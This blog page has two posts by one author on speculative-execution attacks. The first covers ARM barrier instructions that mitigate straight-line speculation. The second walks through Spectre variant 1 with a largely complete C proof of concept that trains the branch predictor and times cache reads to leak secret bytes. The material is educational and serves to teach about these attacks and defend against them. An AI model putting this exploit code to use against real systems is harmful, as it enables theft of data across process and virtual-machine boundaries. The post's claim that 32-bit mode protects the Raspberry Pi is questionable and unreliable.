Stephen Smith's Blog

Musings on Machine Learning…


Blocking Speculative Execution Vulnerabilities on ARM Processors


Introduction

We blogged previously about the Spectre and Meltdown exploits that use the side effects of a CPU's speculative execution to learn secrets that should be protected. The other day, ARM put out a warning and white paper for another similar exploit called "Straight-line Speculation". Spectre and Meltdown take advantage of branch prediction; straight-line speculation is the opposite case, where the processor's speculation mechanism continues on past an unconditional branch instruction.

These side-channel attacks are hard to set up and exploit, but the place where they are most dangerous is in virtual environments, especially in the cloud, because data can leak from one virtual machine to another, allowing an attacker to steal data from another cloud user. Running on a phone or PC isn't as dangerous: if you already have the ability to run a program on the device, you have far more direct ways to do much more dangerous things, so why bother with this? This means that as ARM is used more often in cloud data centers, ARM and its partners are going to have to be very sensitive to these issues.

Why Does a Processor Do This?

Modern CPUs process instructions ahead of the currently executing instruction for performance reasons. A CPU core has the capacity to process several instructions simultaneously, and if one is delayed, say waiting on main memory, other instructions that don't depend on it can be executed. But why would the processor bother to process instructions after an unconditional branch? After all, ARM added the return (RET) instruction to their 64-bit instruction set so that the CPU would know where execution continues next and the pipeline wouldn't need to be flushed.

First, ARM provides reference designs, and many manufacturers, like Apple, take these and improve on them. This means that not all ARM processors work the same in this regard. Some might use a simpler brute-force approach that doesn't interpret the instructions at all; others may add intelligence, so that the speculative pipeline interprets instructions and knows how to follow unconditional branches. The smarter the approach, the more silicon is required to implement it, and possibly the more heat is generated as it does its job.

The bottom line is that not all ARM processors have this problem. Some have limited pipelines and are safe; others interpret instructions and are safe. A few implement the brute-force approach and have the vulnerability. The question then is: what needs to be done about this?

ARM Instructions to Mitigate the Problem

Some ARM processors let you turn off speculative execution entirely. This is a heavy-handed approach and terrible for performance; it may make sense in some security-sensitive situations, but usually the performance hit is too great. The other approach is to use a number of ARM Assembly Language instructions that halt speculative execution when they are encountered. Let's look at them (a short sketch of invoking them from C follows the list):

  • Data Synchronization Barrier (DSB): completes when all instructions before this instruction complete.
  • Data Memory Barrier (DMB): ensures that all explicit memory accesses before the DMB instruction complete before any explicit memory accesses after the DMB instruction start.
  • Instruction Synchronization Barrier (ISB): flushes the pipeline in the processor, so that all instructions following the ISB are fetched from cache or memory, after the ISB has been completed.
  • Speculation Barrier (SB): bars speculation of any instructions after this one, until after it is executed. Note: this instruction is optional and not available on all processors.
  • Clear the cache (MSR and SYS): using these instructions you can clear or invalidate all or part of the cache. However, these are privileged instructions and cannot be executed from user space; generally, they are only used in the operating system kernel.
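As promised above, here is a minimal sketch of how the unprivileged barriers can be emitted from C, assuming an ARM target and a GCC/Clang-style compiler with inline assembly; the wrapper names are my own, and the "memory" clobber also stops the compiler itself from reordering memory accesses across the barrier.

static inline void dsb_sy(void) { __asm__ volatile("dsb sy" ::: "memory"); }  /* wait for prior instructions to complete */
static inline void dmb_sy(void) { __asm__ volatile("dmb sy" ::: "memory"); }  /* order memory accesses before vs after */
static inline void isb_all(void) { __asm__ volatile("isb" ::: "memory"); }    /* flush the pipeline; refetch what follows */

/* SB is optional and not implemented by every core; the assembler also needs
   the +sb architecture extension enabled, as discussed below. */
static inline void speculation_barrier(void) { __asm__ volatile("sb" ::: "memory"); }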

The various ARM security whitepapers have recommendations on how to use these instructions, and developer tools like GCC and LLVM have compiler options to add these instructions to your code.

Adding a DSB/ISB instruction pair after an unconditional branch won't affect the execution performance of your program, but it will increase the program size by 64 bits (two 32-bit instructions) after each unconditional branch. The recommendation is to only turn on the compiler options that generate this extra code in routines that do something sensitive, like handling passwords or users' sensitive data. Linux kernel developers have to be cognizant of these issues to ensure kernel data doesn't leak.

If you are playing with a Raspberry Pi, you can add the DSB, DMB and ISB instructions and run them in user mode. If you add an SB instruction, then you need to add something like "-march=armv8.2-a+sb" to your as command line. The Broadcom ARM processor used in the Pi doesn't support this instruction, so you will get an "Illegal Instruction" error when you execute it.
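As a hedged sketch of that experiment, here is a small C program (the file layout and messages are my own) that exercises the three barriers from user space on a Pi; it should run to completion, while uncommenting the SB line and enabling the +sb extension is expected to die with the "Illegal Instruction" error just described.

#include <stdio.h>

int main(void)
{
    __asm__ volatile("dsb sy" ::: "memory");   /* data synchronization barrier */
    __asm__ volatile("dmb sy" ::: "memory");   /* data memory barrier */
    __asm__ volatile("isb"    ::: "memory");   /* instruction synchronization barrier */

    /* The next line needs an assembler with the +sb extension, and on the
       Pi's Broadcom processor it should be killed with SIGILL if run. */
    /* __asm__ volatile("sb" ::: "memory"); */

    printf("Barriers executed fine in user mode.\n");
    return 0;
}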

Ideally, this should all be transparent to the programmer, and future generations of ARM processors should fix these problems. These instructions were added so systems programmers can address security problems as they appear; without these tools, there would be no remedy. Addressing the current crop of speculative execution exploits doesn't guarantee that new ones won't be discovered in the future. It's a cat and mouse, or whack-a-mole, game between hackers and security professionals. The next generation of chips will be more secure, but then the ball is in the hackers' court.

Summary

It's fascinating to see how hackers can exploit the smallest side-effect in programs or hardware to either take control of a system or steal data from it. These recent exploits show how security has to be taken seriously in all design aspects, whether hardware, microcode, system software or user applications. As new attacks are developed, everyone has to scurry to develop workarounds, solutions and mitigations. In this cat and mouse world, there is no such thing as absolute security, and everyone has to be aware that there are always risks if you are attached to a network.

If you are interested in these sorts of topics, be sure to check out my book: Programming with 64-Bit ARM Assembly Language.

Written by smist08

June 12, 2020 at 5:13 pm

Spectre Attacks on ARM Devices


Introduction

I predicted that 2018 would be a very bad year for data breaches and security problems, and we have already started the year with the Intel x86 specific Meltdown exploit and the Spectre exploit that works on all sorts of processors and even on some JavaScript systems (like Chrome). Since my last article was on Assembler programming, and most of these types of exploits are created in Assembler, I thought it might be fun to look at how Spectre works and get a feel for how hackers can retrieve useful data out of what seems like nowhere. Spectre is actually a large new family of exploits, so patching them all is going to take quite a bit of time, and, like the older buffer overrun exploits, they are going to keep reappearing.

I've been writing quite a bit about the Raspberry Pi recently, so is the Raspberry Pi affected by Spectre? After all, it affects all Android and Apple devices based on ARM processors. The main Raspberry Pi operating system is Raspbian, which is a variant of Debian Linux optimized for the Pi. A recent criticism of Raspbian is that it is still 32-bit. It turns out that running the ARM in 32-bit mode eliminates a lot of the Spectre attack scenarios; we'll discuss why in this article. If you are running 64-bit software on the Pi (like running Android), then you are susceptible. You are also susceptible to the software versions of this attack, like those in JavaScript interpreters that support branch prediction (like Chromium).

The Spectre hacks work by exploiting how processor branch prediction works, coupled with how data is cached. The exploits use branch prediction to speculatively access data they shouldn't and then use the processor cache to retrieve that data for use. The original article by the security researchers is really quite good and worth a read; it's available here. It has an appendix at the back with C code for Intel processors that is quite interesting.

Branch Prediction

In our last blog post we mentioned that all the 32-bit data processing assembler instructions can be conditionally executed. This is because performing a branch instruction means the instruction pipeline has to be cleared and restarted, which really stalls the processor. The ARM 32-bit solution was good, as long as compilers were good at generating code that used these conditional instructions efficiently. Remember that most code for ARM processors is compiled using GCC, and GCC is a general purpose compiler that works on all sorts of processors, so its optimizations tend to be general purpose rather than processor specific.

When ARM evaluated adding 64-bit instructions, they wanted to keep the instructions 32 bits in length, but they also wanted to add a bunch of new instructions (like integer divide), so they made the decision to eliminate the bits used for conditional execution and have a bigger opcode instead (and hence lots more instructions). I think they also considered that the conditional instructions weren't being used as much as they should be and weren't earning their keep. Plus they now had more transistors to play with, so they could do a couple of other things instead. One was to lengthen the instruction pipeline well beyond the original three stages, and the other was to implement branch prediction. Here the processor keeps a table of 128 branches and the route each took last time through. The processor then executes the most commonly chosen branch, assuming that once the conditional is figured out, it will very rarely need to throw away the work and start over. Generally this longer pipeline with branch prediction leads to much better performance. So what could go wrong?
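As a quick aside on the conditional execution point, here is a tiny hedged example (the function is my own, for illustration): a compiler targeting 32-bit ARM can often turn this comparison into a conditionally executed move (for example MOVLT) rather than a branch, and a 64-bit ARM compiler typically uses a CSEL instruction, so there is no branch for the predictor to guess at.

int max_of(int a, int b)
{
    /* On 32-bit ARM this can compile to CMP plus a conditional MOV;
       on 64-bit ARM to CMP plus CSEL. Either way it is straight-line
       code with no branch, and nothing for branch prediction to do. */
    return (a > b) ? a : b;
}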

Consider the branch statement:

 

/* only use x as an index if it is within array1's bounds */
if (x < array1_size)
    y = array2[array1[x] * 256];


This looks like a good bit of C code: test that an index is in range before using it to access an array. If we didn't do this check, we could get a buffer overrun vulnerability by making x larger than the array size and accessing memory beyond the array. Hackers are very good at exploiting buffer overruns. But sadly (for hackers), programmers are getting better at putting these sorts of checks in (or having automated tools or higher level languages do it for them).

Now consider branch prediction. Suppose we execute this code hundreds of times with legitimate values of x. The processor sees that the conditional is usually true and the second line is usually executed. Branch prediction notices this, so the next time this code runs the processor just starts executing the second line right away and works out the first line in another execution unit at the same time. But what if we enter a large value of x? Branch prediction still speculatively executes the second line, and y is loaded from a piece of memory it shouldn't touch. But so what? Eventually the conditional in the first line is evaluated and that value of y is discarded; some processors will even zero it out (after all, they do security review these things). So how does that help the hacker? The trick turns out to be exploiting processor caching.
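Here is a hedged sketch of that mistraining step; victim_function, the array sizes and the loop counts are my own names and numbers, wrapping the bounds-checked code from the listing above.

#include <stddef.h>
#include <stdint.h>

uint8_t array1[16], array2[256 * 256];
size_t array1_size = 16;
volatile uint8_t y;                         /* volatile so the load is not optimized away */

void victim_function(size_t x)              /* the bounds-checked code from the listing above */
{
    if (x < array1_size)
        y = array2[array1[x] * 256];
}

void train_then_mispredict(size_t malicious_x)
{
    for (int i = 0; i < 100; i++)           /* legitimate calls: the branch is always taken */
        victim_function(i % array1_size);
    victim_function(malicious_x);           /* out-of-bounds x, but the predictor guesses "taken"
                                               and speculatively reads array1[malicious_x] before
                                               the bounds check resolves */
}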

Processor Caching

No matter how fast memory companies claim their super fast DDR4 memory is, it really isn't, at least compared to CPU registers. To get a bit of extra speed out of memory accesses, all CPUs implement some sort of memory cache, where recently used parts of main memory are cached in the CPU for faster access. Often CPUs have multiple levels of cache: a super fast one, a fast one and a not quite as fast one. The trick to getting at the incorrectly calculated value of y above is to somehow figure out how to access it from the cache. No CPU has a read-from-cache assembler instruction; that would cause havoc and definitely be a security problem. The real CPU vulnerability is that the speculative, out-of-bounds read leaves a footprint in the cache: which part of array2 got loaded depends on the secret byte that was read. Hackers figured out how to infer that, not by reading the cache directly, but by timing memory accesses. They first clear the cache (this is generally supported, and even if it isn't, you can evict entries by reading lots of other data), then time how long it takes to read each candidate byte. A byte that is in the cache reads much faster than one that has to come from main memory, and that difference reveals what the secret value was. Very tricky.
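As a hedged illustration of that timing trick, here is a minimal sketch using the _mm_clflush and __rdtscp Intel intrinsics that also appear in the C listing in the paper's appendix. The buffer and function names are mine; on ARM you would need a different way to flush or evict the cache and a different timer, and real measurement code also adds fences so the timestamps aren't themselves reordered.

#include <stdint.h>
#include <emmintrin.h>      /* _mm_clflush */
#include <x86intrin.h>      /* __rdtscp */

uint8_t buffer[4096];

/* Time a single read of *p in cycles; a read that hits the cache comes
   back far faster than one that has to go out to main memory. */
static uint64_t time_read(volatile uint8_t *p)
{
    unsigned int aux;
    uint64_t start = __rdtscp(&aux);
    (void)*p;                               /* the access being timed */
    return __rdtscp(&aux) - start;
}

uint64_t demo(void)
{
    buffer[0] = 1;                          /* touch the page so it is really backed by memory */
    _mm_clflush(&buffer[0]);                /* evict this line from the cache hierarchy */
    uint64_t cold = time_read(&buffer[0]);  /* slow: comes from main memory */
    uint64_t warm = time_read(&buffer[0]);  /* fast: the first read cached it */
    return cold - warm;                     /* a large positive gap is expected */
}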

Recap

So to recap, the Spectre exploit works as follows:

  1. Clear the cache
  2. Execute the target branch code repeatedly with correct values
  3. Execute the target with an incorrect value
  4. Loop through the possible values, timing the read access to find the one that is in the cache

This can then be put in a loop to read large portions of a program's private memory, as in the sketch below.
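Putting the four steps together, here is a hedged, much simplified sketch in the spirit of the C listing in the appendix of the researchers' paper. Like that listing it targets x86, using Intel's _mm_clflush and __rdtscp intrinsics (on ARM you would need different cache-flush and timing primitives), and every name, size and threshold is my own invention for illustration. Real exploit code also flushes array1_size so the bounds check is slow enough for speculation to run ahead, adds memory fences around the timing, and retries each byte many times to beat the noise.

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <emmintrin.h>      /* _mm_clflush */
#include <x86intrin.h>      /* __rdtscp */

#define CACHE_HIT_THRESHOLD 80          /* cycles; a machine-dependent guess */

uint8_t array1[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
size_t  array1_size = 16;
uint8_t array2[256 * 256];              /* probe array: a 256-byte slot per possible byte value */
const char *secret = "Squeamish Ossifrage";  /* stands in for memory we shouldn't be able to read */
volatile uint8_t temp;                  /* stops the compiler optimizing the speculative load away */

void victim_function(size_t x)
{
    if (x < array1_size)                /* the branch the attacker mistrains */
        temp = array2[array1[x] * 256];
}

/* Try to recover the byte that lives at array1 + malicious_x. */
int read_one_byte(size_t malicious_x)
{
    uint64_t best_time = UINT64_MAX;
    int best_guess = -1;
    unsigned int aux;

    for (int i = 0; i < 256; i++)       /* step 1: flush every probe slot out of the cache */
        _mm_clflush(&array2[i * 256]);

    for (int j = 0; j < 30; j++)        /* step 2: train the predictor with in-range values */
        victim_function(j % array1_size);

    victim_function(malicious_x);       /* step 3: out-of-bounds x, speculated down the "safe" path */

    for (int i = 0; i < 256; i++) {     /* step 4: time each slot; the cached one reveals the byte */
        volatile uint8_t *addr = &array2[i * 256];
        uint64_t start = __rdtscp(&aux);
        (void)*addr;
        uint64_t elapsed = __rdtscp(&aux) - start;
        if (elapsed < best_time) {
            best_time = elapsed;
            best_guess = i;
        }
    }
    return (best_time < CACHE_HIT_THRESHOLD) ? best_guess : -1;
}

int main(void)
{
    memset(array2, 1, sizeof(array2));  /* make sure array2 is backed by real pages */
    size_t offset = (size_t)(secret - (const char *)array1);
    for (size_t k = 0; k < strlen(secret); k++)
        printf("guess for byte %zu: %d\n", k, read_one_byte(offset + k));
    return 0;
}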

Summary

The Spectre attack is a very serious new technique for hackers to get at our data. It will be like buffer overruns: there won't be one quick fix, and people are going to be patching systems for a long time on this one. As more hackers understand this attack, there will be all sorts of creative offshoots that wreak further havoc.

Some of the remedies, like turning off branch prediction or memory caching, would cause huge performance problems. Generally the real fixes need to be in the CPUs. Beyond that, systems like JavaScript interpreters, or even the .NET runtime or Java VMs, could have this vulnerability in their optimization systems. These can be fixed in software, but then you need a huge number of systems to be patched, and we know from experience that this takes a very long time, with all sorts of bad things happening along the way.

The good news for Raspberry Pi Raspbian users is that the ARM in the older 32-bit mode isn't susceptible; it is only susceptible through software routes like JavaScript. But as hackers develop these techniques going forward, perhaps they will find a combination that works on the Raspberry Pi, so you can never be complacent.

 

Written by smist08

January 5, 2018 at 10:42 pm